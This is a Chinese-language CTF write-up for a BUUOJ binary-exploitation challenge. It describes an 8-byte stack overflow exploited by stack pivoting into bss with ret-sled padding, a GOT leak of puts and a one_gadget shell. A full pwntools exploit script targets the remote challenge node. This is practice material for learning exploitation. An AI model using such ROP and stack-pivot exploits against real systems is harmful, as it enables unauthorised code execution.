1.checksec
2.ida
在read buf处存在栈溢出漏洞,但只能溢出8字节,而后面有向bss段bank处读入数据,我们就可以通过栈迁移,借用bank处的bss段构建栈,但因为该bss段距离.got.plt段非常近,所以要通过在bank处构建的payload时先填充20个ret指令的地址从而实现抬高栈,这样就不会覆盖到got表处了,抬高20个可能是因为后面又要回到main函数,而main函数中要执行sub esp 60h这样如果没有抬栈就会由于主函数中的操作将got段覆盖掉。
该题还有一个就是用了一个工具one_gadget
看了一下第二个条件就可以满足,偏移是0x4526a,只要通过泄露libc计算出基址就可以通过该偏移得到该shell的地址。
3.exp
from pwn import*
context(os='linux',arch='amd64')
p=remote('node5.buuoj.cn',25719)
#p=process('./29')
elf=ELF('./29')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
lea_ret=0x400699
rdi_ret=0x400703
ret=0x4004c9
bss=0x601080
payload=b'a'*0x60+p64(bss)+p64(lea_ret)
p.send(payload)
payload=p64(ret)*20+p64(rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendline(payload)
p.recvuntil('now!\n')
puts_ad=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_ad))
libc=ELF('./ubantu1664.so')
libcbase=puts_ad-libc.sym['puts']
one_gadget=libcbase+0x4526a
payload=b'a'*0x68+p64(one_gadget)
p.send(payload)
p.interactive()